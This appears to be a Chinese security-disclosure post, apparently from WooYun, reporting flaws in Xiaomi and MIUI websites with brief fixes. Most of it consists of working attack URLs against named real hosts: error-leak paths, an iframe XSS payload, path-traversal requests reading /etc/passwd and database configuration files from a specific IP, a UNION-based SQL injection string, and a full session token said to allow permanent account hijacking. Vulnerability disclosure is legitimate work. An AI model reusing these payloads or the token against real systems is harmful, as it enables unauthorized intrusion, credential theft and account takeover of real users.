1:网站＋论坛的错误信息泄露
 2:跨站攻击
 3:任意文件下载
 4:会话管理隐患
 后续有新发现会继续更新。
 
漏洞证明：
 
1:网站＋论坛的错误信息泄露
 http://res.api.miui.com/index.php
 http://bbs.xiaomi.com/uc_server/control/admin/db.php
 http://bbs.miliao.com/uc_server/control/admin/db.php
 http://ucenter.miui.com/uc_server/control/admin/db.php
 http://www.xiaomigongshe.com/wp-admin/includes/admin.php
 http://resource.xiaomi.net/
 
 
 




 
 
 
 
 
 
 
 
2:跨站攻击
 munion.xiaomi.com/index.php?mod=<iframe src=//>
 
 3:任意文件下载
 http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../etc/passwd
 http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../opt/uficc/web/admin/login.jsp
 http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../opt/uficc/icc_config/Proxool.properties
 
 
 


 
 
 
 
 
 
 
 
 
 
 
数据库帐号密码
 
 
 
 
 
4:会话管理隐患
 
http://order.xiaomi.com/site/callback?referer=http%3A%2F%2Fwww.xiaomi.com%2F&token=S8yHMDpLJ0Lc432m%2BJAQm5eNQxFBlRS7MbwAUj4KKM167uPKTdiZOfg0%2F1H05maHjIvK0PF1ddFL%2B2oWju0Y1z0MNNfWO0DkMw0rloN%2FCGPUNx32vPCtZdpiY8ipQJsqku3cYSBn6IjHNbbahQvHCktF%2BFtTRew3gFE1se%2BfyVLIquEbGayAlk8ZLlfF2QCOZcnTTzhLoZIWltApcgkcL01uY84SYzYn29iczPjsWuE%3D
 
 
在任意第三方获取token后可劫持该帐号，且不论该帐号修改了密码均可劫持帐户，并没有时间限制（同时未进行二次会话验证，），只要一个token在手，实时有效。
 
修复方案：

修复方案：
1：关闭php错误信息显示

2：过滤非法敏感参数
3：可以使用服务器的用户权限来解决。

作者 猪哥靓@乌云


第二部分：

1、某分站SQL注射点
http://tg.miliao.com/index.php?action=member-register&act=getSchool&province_id=101%20and%201=2%20union%20select%201,2,TABLE_NAME,4%20from%20INFORMATION_SCHEMA.TABLES--

2、Miui 某注入BUG
http://www.miui.com/extra.php?mod=themevote/stat&tpp=1/*!select*/&page=2
此定义为BUG，因为暂没发现可以利用的方法。




修复方案：加强防注

作者 Jannock